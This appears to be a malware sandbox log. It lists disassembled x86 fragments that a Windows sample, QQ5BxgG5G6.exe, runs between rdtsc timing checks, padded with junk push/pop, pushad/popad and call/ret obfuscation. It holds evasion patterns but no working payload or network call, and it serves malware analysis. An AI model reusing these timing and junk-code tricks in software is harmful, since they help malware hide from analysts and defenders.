              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FA11 second address: F1FABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F88DD0CB148h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, 1B6D51C1h 0x0000002e sub dword ptr [ebp+122D17E7h], eax 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F88DD0CB148h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov dword ptr [ebp+124590B5h], ecx 0x00000056 mov edi, dword ptr [ebp+122D19E2h] 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F88DD0CB158h 0x00000065 jmp 00007F88DD0CB159h 0x0000006a popad 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FABB second address: F1FAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FAC1 second address: F1FAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1FC0F second address: F1FC13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F217CB second address: F21818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F88DD0CB14Ch 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F88DD0CB148h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D28D4h], eax 0x0000002f push 00000000h 0x00000031 mov bx, cx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+124804A4h], eax 0x0000003c or bl, FFFFFFC4h 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F23A39 second address: F23A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F23A3D second address: F23A53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F88DD0CB166h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F24C2A second address: F24C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F24C2E second address: F24C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F279E4 second address: F27A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F88DC6CD049h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A1B second address: F27A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A1F second address: F27A2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A2D second address: F27A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A32 second address: F27A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88DC6CD047h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A5E second address: F27A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C35 second address: ED5C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 pushad 0x00000008 jc 00007F88DC6CD036h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C56 second address: ED5C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB14Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C71 second address: ED5C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD044h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C89 second address: ED5C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F2917B second address: F29185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F28235 second address: F28258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F88DD0CB152h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F29330 second address: F29342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F29342 second address: F293EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F88DD0CB14Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F88DD0CB148h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D38EEh] 0x0000002e push eax 0x0000002f jmp 00007F88DD0CB14Dh 0x00000034 pop ebx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jno 00007F88DD0CB14Ch 0x00000049 mov eax, dword ptr [ebp+122D0D65h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F88DD0CB148h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D1F4Dh], eax 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 jns 00007F88DD0CB146h 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F293EC second address: F293F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC4F49 second address: EC4F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC4F4D second address: EC4F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F32643 second address: F32649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F32649 second address: F3264D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F327D4 second address: F327D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F5F second address: F38F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F82 second address: F38F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F8C second address: F38F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3DA18 second address: F3DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB150h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3C771 second address: F3C775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3C775 second address: F3C794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DD0CB159h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CD21 second address: F3CD27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFCF second address: F3CFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFD5 second address: F3CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007F88DC6CD036h 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f jmp 00007F88DC6CD040h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFF9 second address: F3D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F88DD0CB14Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D128 second address: F3D15B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F88DC6CD036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F88DC6CD03Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F88DC6CD045h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D535 second address: F3D580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F88DD0CB155h 0x0000000a push edx 0x0000000b jmp 00007F88DD0CB153h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 push edi 0x00000015 jnl 00007F88DD0CB152h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D580 second address: F3D584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46276 second address: F4627C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4627C second address: F46282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46282 second address: F4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F468A4 second address: F468AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F469E8 second address: F469FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB152h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F469FE second address: F46A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jbe 00007F88DC6CD03Ch 0x00000016 jnc 00007F88DC6CD036h 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F88DC6CD03Fh 0x00000024 jng 00007F88DC6CD036h 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46A38 second address: F46A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnp 00007F88DD0CB14Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46F2C second address: F46F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F88DC6CD03Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46F3E second address: F46F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F470AB second address: F470C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD044h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF60F8 second address: EF6118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F88DD0CB151h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF6118 second address: EF611D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F475D8 second address: F47612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 jnp 00007F88DD0CB146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F88DD0CB152h 0x00000015 pop edx 0x00000016 pop edi 0x00000017 push ebx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d jnp 00007F88DD0CB146h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F45F5E second address: F45F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F45F64 second address: F45F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7D8 second address: F4A7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F88DC6CD03Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7EA second address: F4A7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7F5 second address: F4A7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C48F second address: F0C494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C494 second address: F0C4F2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88DC6CD038h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, 346Ah 0x00000011 lea eax, dword ptr [ebp+124881C4h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F88DC6CD038h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edx, edi 0x00000033 jne 00007F88DC6CD050h 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C4F2 second address: F0C4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C4F6 second address: F0C500 instructions: 0x00000000 rdtsc 0x00000002 je 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C500 second address: EF558B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F88DD0CB14Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F88DD0CB14Ah 0x00000010 nop 0x00000011 mov edx, edi 0x00000013 call dword ptr [ebp+122DB6DCh] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F88DD0CB146h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C5EF second address: F0C5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CACF second address: D57C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F88DD0CB152h 0x0000000c nop 0x0000000d jg 00007F88DD0CB146h 0x00000013 push dword ptr [ebp+122D16C9h] 0x00000019 mov cl, B7h 0x0000001b mov ecx, dword ptr [ebp+122D3A26h] 0x00000021 call dword ptr [ebp+122D305Ch] 0x00000027 pushad 0x00000028 cmc 0x00000029 xor eax, eax 0x0000002b add dword ptr [ebp+122D2C5Ch], ebx 0x00000031 sub dword ptr [ebp+122D2C5Ch], ecx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F88DD0CB152h 0x00000040 mov dword ptr [ebp+122D3ABEh], eax 0x00000046 pushad 0x00000047 mov ecx, 32B1ADF2h 0x0000004c cld 0x0000004d popad 0x0000004e mov esi, 0000003Ch 0x00000053 jmp 00007F88DD0CB14Ah 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c cld 0x0000005d lodsw 0x0000005f jmp 00007F88DD0CB14Fh 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F88DD0CB14Ch 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 sbb edi, 4D8821E9h 0x00000078 mov dword ptr [ebp+122D2C5Ch], edi 0x0000007e popad 0x0000007f cmc 0x00000080 nop 0x00000081 push ecx 0x00000082 jmp 00007F88DD0CB14Bh 0x00000087 pop ecx 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jnc 00007F88DD0CB14Ch 0x00000091 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CBEB second address: F0CC0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD043h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CF1E second address: F0CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CF22 second address: F0CF31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D7E9 second address: F0D837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F88DD0CB156h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ecx, dword ptr [ebp+122D25EDh] 0x00000016 lea eax, dword ptr [ebp+12488208h] 0x0000001c mov cl, E3h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jno 00007F88DD0CB146h 0x00000028 jmp 00007F88DD0CB154h 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D837 second address: F0D852 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DC6CD038h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F88DC6CD03Ch 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D852 second address: F0D858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D858 second address: F0D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
